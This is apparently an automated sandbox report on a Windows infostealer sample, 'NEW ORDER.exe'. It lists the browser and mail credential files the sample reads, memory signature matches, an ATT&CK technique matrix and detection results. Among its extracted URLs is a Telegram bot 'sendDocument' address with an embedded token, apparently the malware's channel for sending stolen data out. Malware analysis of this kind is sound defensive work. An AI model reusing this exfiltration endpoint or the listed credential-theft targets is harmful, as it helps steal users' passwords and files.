Source: C:\Users\user\Desktop\NEW ORDER.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\NEW ORDER.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\NEW ORDER.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\NEW ORDER.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
Source: Yara match | File source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
MITRE ATT&CK Matrix (numbers preceding a technique are the signature counts shown in the report)

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| Valid Accounts | 211 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Web Service | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Scheduled Task/Job | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 114 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 13 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 21 Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

| Source | Detection | Scanner | Label | Link |
| NEW ORDER.exe | 49% | Virustotal | | Browse |
| NEW ORDER.exe | 100% | Avira | HEUR/AGEN.1235429 | |
| NEW ORDER.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| C:\Users\user\AppData\Roaming\HvabCK.exe | 100% | Avira | HEUR/AGEN.1235429 | |
| C:\Users\user\AppData\Roaming\HvabCK.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link | Download |
| 7.0.NEW ORDER.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File |
| 0.0.NEW ORDER.exe.960000.0.unpack | 100% | Avira | HEUR/AGEN.1235429 | | Download File |

No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe | |
| http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe | |
| http://www.tiro.com | 0% | URL Reputation | safe | |
| https://api.ipify.org%%startupfolder% | 0% | URL Reputation | safe | |
| http://www.goodfont.co.kr | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cnF | 0% | URL Reputation | safe | |
| http://www.carterandcone.comothf | 0% | Avira URL Cloud | safe | |
| http://www.sajatypeworks.com | 0% | URL Reputation | safe | |
| http://www.typography.netD | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe | |
| http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe | |
| http://fontfabrik.com | 0% | URL Reputation | safe | |
| https://api.telegram.org4 | 0% | URL Reputation | safe | |
| http://www.carterandcone.comCu | 0% | Avira URL Cloud | safe | |
| http://www.fonts.comnK | 0% | Avira URL Cloud | safe | |
| http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe | |
| http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe | |
| http://www.sajatypeworks.comb | 0% | Avira URL Cloud | safe | |
| http://www.sandoll.co.kr | 0% | URL Reputation | safe | |
| http://www.urwpp.deDPlease | 0% | URL Reputation | safe | |
| http://www.sajatypeworks.comeG | 0% | Avira URL Cloud | safe | |
| http://www.zhongyicts.com.cn | 0% | URL Reputation | safe | |
| http://www.sakkal.com | 0% | URL Reputation | safe | |
| https://api.ipify.org% | 0% | URL Reputation | safe | |
| http://www.galapagosdesign.com/L | 0% | Avira URL Cloud | safe | |
| http://www.carterandcone.comd | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cnGZ | 0% | Avira URL Cloud | safe | |
| https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe | |
| http://www.carterandcone.comh | 0% | URL Reputation | safe | |
| http://www.carterandcone.coml | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cn. | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cn | 0% | URL Reputation | safe | |
| http://www.fontbureau.comoitu | 0% | URL Reputation | safe | |
| http://www.monotype. | 0% | URL Reputation | safe | |
| http://www.fontbureau.comt | 0% | URL Reputation | safe | |
| http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe | |
| http://www.fontbureau.comce | 0% | URL Reputation | safe | |
| http://gesqcS.com | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| api.telegram.org | 149.154.167.220 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
| https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| http://127.0.0.1:HTTP/1.1 | NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://www.fontbureau.com/designersG | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.fontbureau.com/designers/? | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.founder.com.cn/cn/bThe | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://api.telegram.org | NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocumentdocument----- | NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.fontbureau.com/designers? | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.tiro.com | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.fontbureau.com/designers | NEW ORDER.exe, 00000000.00000003.238918778.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.ipify.org%%startupfolder% | NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | low |
| http://www.goodfont.co.kr | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.founder.com.cn/cnF | NEW ORDER.exe, 00000000.00000003.233743153.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.233723837.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.carterandcone.comothf | NEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/ | NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| http://www.sajatypeworks.com | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.typography.netD | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.founder.com.cn/cn/cThe | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.galapagosdesign.com/staff/dennis.htm | NEW ORDER.exe, 00000000.00000003.242718317.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241924098.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241560139.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242251783.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241387291.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242063281.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242521890.0000000005C58000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://fontfabrik.com | NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://api.telegram.org4 | NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.carterandcone.comCu | NEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmp | false |
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fonts.comnKNEW ORDER.exe, 00000000.00000003.231040731.0000000005C6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designerseNEW ORDER.exe, 00000000.00000003.244166604.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://DynDns.comDynDNSnamejidpasswordPsi/PsiNEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fonts.comNEW ORDER.exe, 00000000.00000003.230978289.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sajatypeworks.combNEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sandoll.co.krNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deDPleaseNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comeGNEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zhongyicts.com.cnNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designerspNEW ORDER.exe, 00000000.00000003.239168700.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sakkal.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.ipify.org%NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            low
                                            http://www.fontbureau.com/designerstNEW ORDER.exe, 00000000.00000003.239093431.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.galapagosdesign.com/LNEW ORDER.exe, 00000000.00000003.241408459.0000000005C63000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.0NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.carterandcone.comdNEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cnGZNEW ORDER.exe, 00000000.00000003.234068944.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwNEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comhNEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comlNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlhNEW ORDER.exe, 00000000.00000003.239721792.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.239784127.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn.NEW ORDER.exe, 00000000.00000003.234284743.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnNEW ORDER.exe, 00000000.00000003.234284743.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234068944.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.235384051.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234357988.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-user.htmlNEW ORDER.exe, 00000000.00000003.239369021.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.comoituNEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNEW ORDER.exe, 00000000.00000003.239721792.0000000005C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.monotype.NEW ORDER.exe, 00000000.00000003.240428883.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comtNEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.comceNEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://gesqcS.comNEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://api.telegram.orgNEW ORDER.exe, 00000007.00000002.502497104.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
IP:149.154.167.220
Domain:api.telegram.org
Country:United Kingdom
ASN:62041
ASN Name:TELEGRAMRU
Malicious:false
IP:192.168.2.1
                                                              Joe Sandbox Version:35.0.0 Citrine
                                                              Analysis ID:680495
Start date and time:2022-08-08 17:41:11 +02:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 7m 46s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:NEW ORDER.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:34
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@11/5@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HDC Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time:17:42:21
Type:API Interceptor
Description:681x Sleep call for process: NEW ORDER.exe modified
                                                              No context
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):49830
                                                              Entropy (8bit):3.076173619727473
                                                              Encrypted:false
                                                              SSDEEP:1536:D6HlpaNrx5Sm1CXUREWK8vHAVlYUETpm8IydxZr:D6HlpaNrx5Sm1CXUREWK8fAVlYUETpmG
                                                              MD5:41BC3D42B97F306F77B9C51A43A9DB99
                                                              SHA1:ABEBE82847E4CBD2707565F9EA43989619B5964F
                                                              SHA-256:1E5C8B3A9B7348F8C1A462AB8F9BB4B183AE277441AB8F9BCFAA224B7E12D9C4
                                                              SHA-512:079C32034B89D52E0A002919E8E65C1FB706E813DAAEBB40B7129047E42B13141BEED82AB0C82BAE8052D170154737B4D4F75B65884E5029D237622689B17675
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):13340
                                                              Entropy (8bit):2.699353236675257
                                                              Encrypted:false
                                                              SSDEEP:96:kiZYW+CCh1LnYbYFWGvHS+YEZ9Xatni6RWpmwydJnaDbi8xc6IAp3:hZD+CqcOXaZaDb5xctAp3
                                                              MD5:8A4C305545EE8522F44FF572F4B3EE96
                                                              SHA1:676B0F89159679C23DF0E7270693E8991DE18A41
                                                              SHA-256:3AFA4E0F96F039C719583842A43B8540B8390D1D73081FB4856272DEAEC2D854
                                                              SHA-512:E53EF9D5A8570C4850A701553604D1E8CC93B02AD7787E9A36DCE877F4EC4DF81412DA918ACEEB479E6E28A0744F3CFE376887AB16AE9B34866A56F737BCE0DC
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.355304211458859
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                              MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
